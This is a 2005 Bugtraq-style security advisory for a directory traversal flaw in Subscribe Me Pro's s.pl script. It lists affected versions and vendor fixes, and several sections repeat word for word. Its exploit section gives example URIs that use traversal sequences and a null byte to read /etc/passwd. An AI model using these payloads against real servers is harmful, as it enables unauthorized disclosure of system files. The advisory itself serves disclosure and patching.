Subscribe Me Pro S.PL Remote Directory Traversal Vulnerability
BID:14817
Info
Subscribe Me Pro S.PL Remote Directory Traversal Vulnerability
| Bugtraq ID: | 14817 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 13 2005 12:00AM |
| Updated: | Sep 13 2005 12:00AM |
| Credit: | [email protected] is credited with the discovery of this vulnerability. |
| Vulnerable: |
Subscribe Me Pro Subscribe Me Pro 2.44 .09P |
| Not Vulnerable: |
Subscribe Me Pro Subscribe Me Pro 2.50 .01P |
Discussion
Subscribe Me Pro S.PL Remote Directory Traversal Vulnerability
Subscribe Me Pro is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input.
Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker. Information obtained through this attack may aid in further attacks against the underlying system.
Subscribe Me Pro 2.044.09P and prior are affected by this vulnerability.
Subscribe Me Pro is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input.
Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker. Information obtained through this attack may aid in further attacks against the underlying system.
Subscribe Me Pro 2.044.09P and prior are affected by this vulnerability.
Exploit / POC
Subscribe Me Pro S.PL Remote Directory Traversal Vulnerability
An exploit is not required.
The following example URI have been provided:
http://www.example.com/[dir]/s.pl?e=1&subscribe=subscribe&l=../../../../../../../../etc/passwd%00&SUBMIT=%20%20Submit%20%20
http://www.example.com/[dir]/s.pl?e=enter%20your%20email%20address%20here&subscribe=subscribe&l=../../../../../../../../etc/passwd%00
An exploit is not required.
The following example URI have been provided:
http://www.example.com/[dir]/s.pl?e=1&subscribe=subscribe&l=../../../../../../../../etc/passwd%00&SUBMIT=%20%20Submit%20%20
http://www.example.com/[dir]/s.pl?e=enter%20your%20email%20address%20here&subscribe=subscribe&l=../../../../../../../../etc/passwd%00
Solution / Fix
Subscribe Me Pro S.PL Remote Directory Traversal Vulnerability
Solution:
The vendor has released version 2.050.01P to address this issue. The vendor has also released a security patch for this issue:
Subscribe Me Pro Subscribe Me Pro 2.44 .09P
Solution:
The vendor has released version 2.050.01P to address this issue. The vendor has also released a security patch for this issue:
Subscribe Me Pro Subscribe Me Pro 2.44 .09P
-
Subscribe Me Pro sp2.zip
http://users.cgiscriptcenter.com:90/cgiscmembers/subpro/security_advis ory/sp2.zip -
Subscribe Me Pro 2.050.01P
http://siteinteractive.com/subpro/
References
Subscribe Me Pro S.PL Remote Directory Traversal Vulnerability
References:
References:
- Subscribe Me Pro Web Site (Subscribe Me Pro)
- Re: Subscribe Me Pro 2.044.09P and prior Directory Traversal (Subscribe Me Pro)
- Subscribe Me Pro 2.044.09P and prior Directory Traversal Vulnerability ([email protected])